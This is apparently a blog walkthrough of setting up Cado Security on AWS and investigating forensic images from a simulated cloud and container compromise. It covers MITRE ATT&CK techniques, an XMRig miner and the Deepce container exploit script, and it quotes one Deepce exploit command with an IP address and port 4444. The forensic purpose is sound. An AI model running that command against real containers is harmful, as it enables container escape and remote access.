Cloud Forensic — Cado Cloud and Container Compromised Simulator
What is Cado Security?
The Cado platform automates data capture and processing so security teams can easily understand threats without wasting time, money, or effort. Forensic-level detail without forensic-level effort.
Cado Security empowers security teams with a robust platform that helps them get to the bottom of what happened. With Cado, what used to take analysts days, now takes minutes. Automate data collection. Process data at cloud speed. Analyze with purpose. No confusion, no complexity.
How to use Cado Security?
First you need to register cado here: Webinar: Captured by Cado — Serverless & Container Attack Investigation (cadosecurity.com)
then you will received an email like this.
This email will provide you with information about on-boarding the Cado security.
How to install Cado Security Community Edition?
- You will need an AWS Account.
- Open “Key Pairs” from AWS and create a key .
3. Open “Cloud Formation” and then upload the Cado Response Community Edition Template.
4. Then fill the sections you required to fill.
5. After that you need to check the acknowledgement and then you able to create a stack.
6. You need to wait until the status shown as CREATE_COMPLETE
7. From outputs you will see Cado URl and Instance ID
8. Access the following URL and login using Admin and Instance ID
9. Accept the End User License Agreement
10. After login for the first time you’ll asked to change your password.
11. Upload the community_license you received from email.
Now you can use Cado Security Portal.
Simulate Compromised Cloud and Container
In this article i’m gonna simulate Compromised Cloud Container this Cado Security Github. This simulator trigger malware detections.
- Open the github page and download the Forensic Images.
The Forensic Images contain forensic images for an Amazon Linux and an Amazon Ubuntu EC2 system after Cloud And Container Compromise Simulator was executed. They are in standard dd format.
Or you can also run the simulator manually
2. After the forensic images were downloaded, upload it to Amazon S3 Buckets.
3. Now open the cado security portal and create a project.
4. Choose Import Evidence and import data from AWS Artifacts from S3.
5. Choose the images and import.
6. Now wait until the process finish.
7. Afterwards, now we can start investigating!.
Associated attack techniques to MITRE ATT&CK frameworks
These are the 12 tactics and techniques :
- Escape to Host- (T1611)
- Exploitation for Privilege Escalation- (T1068)
- Privilege Escalation- (TA0004)
- Account Discovery- (T1087)
- Execution- (TA0002)
- Resource Hijacking- (T1496)
- Credential Access- (TA0006)
- Clear Command History- (T1070.003)
- Standard Encoding- (T1132.001)
- Disable or Modify Tools- (T1562.001)
- SSH Authorized Keys- (T1098.004)
- Container Administration Command- (T1609)
Suspicious Events
Compromised with a coin miner (XmRig). A coin miner is a piece of software used to mine for virtual cryptocurrency. The coin miner software is in itself not malicious. The coin mining software is often unique to a specific cryptocurrency e.g. Monero. Some known mining software that is often used for malicious purposes is XMRig or Bird Miner. An attack that results in the installation of a coin miner is often referred to as “cryptojacking”.
Also the container is compromised with Deepce. Deepce is a container enumeration and exploit script designed usually for pen tester.
Command that attacker used to exploit the container and from the command we can know the victim IP Address is 192.168.0.23
./deepce.sh -e SOCK -l -i 192.168.0.23 -p 4444I’m checking on the /var/log/secure and i can see the attacker was adding a new user ‘ec2-user’ to ‘adm’ group. and from here we can see the attacker IP is 172.31.51.148
Conclusion
Cado security is one of essentials cyber security automation tools for investigating and addressing threats.
Thank you for reading my article. I really appreciate any feedback that will help me keep developing into the best version of myself.
